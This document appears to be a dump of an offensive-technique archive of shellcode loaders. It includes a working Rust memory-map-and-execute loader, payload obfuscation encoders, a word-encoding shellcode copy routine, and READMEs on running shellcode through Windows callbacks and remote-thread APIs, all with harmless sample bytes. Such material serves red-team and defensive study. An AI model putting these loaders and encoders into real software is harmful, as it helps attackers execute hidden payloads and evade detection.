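    payload = bytes([0x90, 0x90, 0xCC, 0xC3, 0x41])   # constructed sample, odd length
    key = random.randrange(1, 255)
    print(xor_chain_decode(xor_chain_encode(payload, 0x5A), 0x5A) == payload)
    print(bit_rotation_decode(bit_rotation_encode(payload)) == pad_even(payload))
    print(bit_crossover_decode(crossed_encode(payload, key, cross_nibble)) == pad_even(payload))
    print(bit_swap_decode(crossed_encode(payload, key, cross_bits)) == pad_even(payload))
```

The decoders undo the steps in reverse order (XOR, then rotation, then crossover), and the extra NOP added by the pair-based encoders stays at the end of the decoded buffer, which is harmless because it sits after the payload's final instruction.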
/windows/writing/misc/rust/memmap2/src/main.rs:
--------------------------------------------------------------------------------
/*
    Shellcode Loader
    Archive of Reversing.ID

    Allocation and change permission with memmap2.
    memmap2 is a cross-platform wrapper around memory-mapping operations (not only Windows).

    Compile:
    $ cargo build

    Technique:
    - allocation: MmapOptions::map_anon (anonymous RW mapping)
    - writing: copy_from_slice into the mapping
    - permission: MmapMut::make_exec (RW -> RX, the mapping is never RWX)
    - execution: unsafe call to function pointer
*/

use memmap2::MmapOptions;
use std::mem::transmute;

fn main() {
    // shellcode storage in stack (NOP, NOP, INT3, RET)
    let payload: [u8; 4] = [0x90, 0x90, 0xCC, 0xC3];

    // allocate memory buffer for payload as READ-WRITE (no executable)
    let mut mmap = MmapOptions::new()
        .len(payload.len())
        .map_anon()
        .expect("[-] unable to allocate");

    // copy payload to the buffer
    mmap.copy_from_slice(&payload);

    // make buffer executable (R-X); make_exec consumes the writable map
    let mmap = mmap
        .make_exec()
        .expect("[-] unable to change permission");

    // cast the payload into function and execute
    unsafe {
        let ep: extern "C" fn() = transmute(mmap.as_ptr());
        ep();
    }
}
--------------------------------------------------------------------------------
/windows/execution/callback/CertFindChainInStore/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CertFindChainInStore`.
The callback pointer goes into `CERT_CHAIN_FIND_BY_ISSUER_PARA.pfnFindCallback`, passed as `pvFindPara` with `dwFindType = CERT_CHAIN_FIND_BY_ISSUER`. It is only invoked when the store yields a candidate chain, so an empty store never runs the payload; that is why a populated system store (`CertOpenSystemStore`) is used.

```c++
PCCERT_CHAIN_CONTEXT CertFindChainInStore (HCERTSTORE hCertStore, DWORD dwCertEncodingType, DWORD dwFindFlags, DWORD dwFindType, const void *pvFindPara, PCCERT_CHAIN_CONTEXT pPrevChainContext);

HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);

HCERTSTORE CertOpenSystemStoreA (HCRYPTPROV_LEGACY hProv, LPCSTR szSubsystemProtocol);

HCERTSTORE CertOpenSystemStoreW (HCRYPTPROV_LEGACY hProv, LPCWSTR szSubsystemProtocol);
```

### Reference

- [MSDN CertFindChainInStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certfindchaininstore)
- [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
- [MSDN CertOpenSystemStoreA](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorea)
- [MSDN CertOpenSystemStoreW](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopensystemstorew)
--------------------------------------------------------------------------------
/windows/allocation/NtAllocateVirtualMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Allocate memory for executing shellcode later.

### Overview

Allocate with `NtAllocateVirtualMemory` and release with `NtFreeVirtualMemory`.
These are `ntdll` system-call stubs without a public user-mode header, so they are resolved with `GetProcAddress` (or declared by hand) rather than included. `BaseAddress` and `RegionSize` are in/out parameters: the kernel rounds them to page granularity and writes back the actual base and size, and the same rounded values must be handed to `NtProtectVirtualMemory` and `NtFreeVirtualMemory` (with `RegionSize = 0` and `MEM_RELEASE` to free the whole region).

```c++
NTSTATUS NtAllocateVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect);

NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PSIZE_T NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection);

NTSTATUS NtFreeVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PSIZE_T RegionSize, ULONG FreeType);
```

### Reference

- [NTInternals NtAllocateVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html)
- [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html)
- [NTInternals NtFreeVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtFreeVirtualMemory.html)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumerateLoadedModulesEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumerateLoadedModulesEx` (`dbghelp.dll`).
The callback is invoked once for every module loaded in `hProcess`, so with `GetCurrentProcess()` it fires immediately for the loader's own image and again for each DLL until the callback returns `FALSE`.

```c++
BOOL EnumerateLoadedModulesEx (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModulesExW (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModules64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACK64 EnumLoadedModulesCallback, PVOID UserContext);

BOOL EnumerateLoadedModulesW64 (HANDLE hProcess, PENUMLOADED_MODULES_CALLBACKW64 EnumLoadedModulesCallback, PVOID UserContext);
```

### Reference

- [MSDN EnumerateLoadedModulesEx](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesex)
- [MSDN EnumerateLoadedModulesExW](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesexw)
- [MSDN EnumerateLoadedModules64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodules64)
- [MSDN EnumerateLoadedModulesW64](https://docs.microsoft.com/en-us/windows/win32/api/dbghelp/nf-dbghelp-enumerateloadedmodulesw64)
--------------------------------------------------------------------------------
/windows/execution/callback/CryptInstallOIDFunctionAddress/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `CryptInstallOIDFunctionAddress`.

The function is installed as a callback that is invoked when a new certificate store is opened: the `rgFuncEntry` table is registered under `pszFuncName` (the store-provider open function, `CRYPT_OID_OPEN_STORE_PROV_FUNC`) for a chosen provider OID, and the payload runs when `CertOpenStore` is called with that provider. The installed function should then be released with `CryptFreeOIDFunctionAddress`, and the store with `CertCloseStore`.

```c++
BOOL CryptInstallOIDFunctionAddress (HMODULE hModule, DWORD dwEncodingType, LPCSTR pszFuncName, DWORD cFuncEntry, const CRYPT_OID_FUNC_ENTRY rgFuncEntry[], DWORD dwFlags);

BOOL CryptFreeOIDFunctionAddress (HCRYPTOIDFUNCADDR hFuncAddr, DWORD dwFlags);

HCERTSTORE CertOpenStore (LPCSTR lpszStoreProvider, DWORD dwEncodingType, HCRYPTPROV_LEGACY hCryptProv, DWORD dwFlags, const void *pvPara);

BOOL CertCloseStore (HCERTSTORE hCertStore, DWORD dwFlags);
```

### Reference

- [MSDN CryptInstallOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptinstalloidfunctionaddress)
- [MSDN CryptFreeOIDFunctionAddress](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptfreeoidfunctionaddress)
- [MSDN CertOpenStore](https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-certopenstore)
- [MSDN CertCloseStore](https://docs.microsoft.com/en-us/windows/win32/api/Wincrypt/nf-wincrypt-certclosestore)
--------------------------------------------------------------------------------
/windows/execution/thread/CreateRemoteThreadEx/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Executing shellcode as a thread.

### Overview

Execute shellcode with `CreateRemoteThreadEx` and wait for it to finish with `WaitForSingleObject`.

`CreateRemoteThread` is normally used to start a thread in another process, but the new thread can just as well run in the current process by passing `GetCurrentProcess()` as `hProcess`.

The difference between `CreateRemoteThread` and `CreateRemoteThreadEx` is the extra `lpAttributeList` parameter of the Ex variant, a `PROC_THREAD_ATTRIBUTE_LIST` that lets the caller set extended thread attributes; both return the ID of the new thread through `lpThreadId`.

```c++
HANDLE CreateRemoteThreadEx (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, LPDWORD lpThreadId);

DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
```

### Reference

- [MSDN CreateRemoteThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex)
- [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject)
--------------------------------------------------------------------------------
/windows/execution/callback/EnumProps/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Abusing callback to run shellcode.

### Overview

Execute shellcode with `EnumProps`.
The callback is invoked once for each property in a window's property list, so a property is first attached with `SetProp` to some window handle (for example the one returned by `GetTopWindow`) and removed again with `RemoveProp` once the enumeration returns.

```c++
int EnumPropsA (HWND hWnd, PROPENUMPROCA lpEnumFunc);

int EnumPropsW (HWND hWnd, PROPENUMPROCW lpEnumFunc);

BOOL SetPropA (HWND hWnd, LPCSTR lpString, HANDLE hData);

BOOL SetPropW (HWND hWnd, LPCWSTR lpString, HANDLE hData);

HANDLE RemovePropA (HWND hWnd, LPCSTR lpString);

HANDLE RemovePropW (HWND hWnd, LPCWSTR lpString);
```

### Reference

- [MSDN EnumPropsA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsa)
- [MSDN EnumPropsW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropsw)
- [MSDN SetPropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropa)
- [MSDN SetPropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setpropw)
- [MSDN RemovePropA](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropa)
- [MSDN RemovePropW](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-removepropw)
- [MSDN GetTopWindow](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-gettopwindow)
--------------------------------------------------------------------------------
/windows/writing/conversion/endianness/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copy the shellcode through an endianness conversion (little-endian and big-endian byte order).

Endianness is the order in which the bytes of a multi-byte integer are laid out in memory. In big-endian representation the most-significant byte comes first; in little-endian the least-significant byte comes first.

Conversion between the two orders is done with the `ntoh` and `hton` families: `ntoh` (network to host) takes a value in network byte order, which is big-endian, and converts it to host byte order, little-endian on x86/x64 Windows; `hton` is the reverse. On a big-endian host both are no-ops, so the shellcode is stored as words in one fixed (network) order and the loader converts each word before writing it, rather than assuming a swap always happens. `htonll` and `ntohll` are Winsock additions (`winsock2.h`) and are not part of the POSIX socket API.

```c++
uint32_t htonl (uint32_t hostlong);
uint64_t htonll (uint64_t Value);

uint32_t ntohl (uint32_t netlong);
uint64_t ntohll (uint64_t Value);
```

### Reference

- [MSDN htonl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonl)
- [MSDN htonll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonll)
- [MSDN ntohl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohl)
- [MSDN ntohll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohll)
--------------------------------------------------------------------------------
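The endianness README describes the copy only in terms of the `htonl`/`ntohl` prototypes. The following is an added example, not code from the Reversing.ID archive, that carries the technique through in Python: the generator side packs the shellcode into 32- or 64-bit words in network (big-endian) order, emitting the C array literal a loader would embed, and the loader side converts each word back with `ntohl` (Python's `socket.ntohl`, the same Winsock function) before writing the bytes in host order. Python has no `htonll`/`ntohll`, so the 64-bit path does the equivalent reinterpretation with `struct`. Function names, the NOP padding choice and the sample payload are this example's own.

```python
# Added example (not part of the archive): endianness-conversion copy,
# generator side (to network-order words) and loader side (back to bytes).
import socket
import struct

def to_network_words(payload, width=4, pad=0x90):
    """Encode payload as host ints holding network-order words.
    The tail is padded with NOPs (0x90) so every word is complete."""
    if width not in (4, 8):
        raise ValueError("width must be 4 or 8")
    padded = payload + bytes([pad]) * (-len(payload) % width)
    fmt = "=I" if width == 4 else "=Q"      # '=' : host byte order, no alignment
    words = []
    for i in range(0, len(padded), width):
        host_word = struct.unpack(fmt, padded[i:i + width])[0]
        if width == 4:
            words.append(socket.htonl(host_word))
        else:
            # htonll equivalent: the host-order value's bytes read as big-endian
            words.append(struct.unpack(">Q", struct.pack(fmt, host_word))[0])
    return words

def from_network_words(words, width=4):
    """Loader side: ntohl/ntohll each word, then write its bytes in host order."""
    fmt = "=I" if width == 4 else "=Q"
    out = bytearray()
    for w in words:
        if width == 4:
            host_word = socket.ntohl(w)
        else:
            host_word = struct.unpack(fmt, struct.pack(">Q", w))[0]
        out += struct.pack(fmt, host_word)   # host-order store == original bytes
    return bytes(out)

def emit_c_array(words, width=4):
    """Render the words as the C initializer a loader would embed."""
    return "{ " + ", ".join("0x{:0{}x}".format(w, width * 2) for w in words) + " }"

if __name__ == "__main__":
    payload = bytes([0x90, 0x90, 0xCC, 0xC3, 0x41])   # constructed sample, 5 bytes
    for width in (4, 8):
        words = to_network_words(payload, width)
        print(width, emit_c_array(words, width))
        print(from_network_words(words, width)[:len(payload)] == payload)
```

Because the stored words are in a fixed order, the result is the same whether the machine that runs the loader is little- or big-endian; on a big-endian host `htonl`/`ntohl` simply return their argument. The padding NOPs land after the payload's last instruction and are never reached.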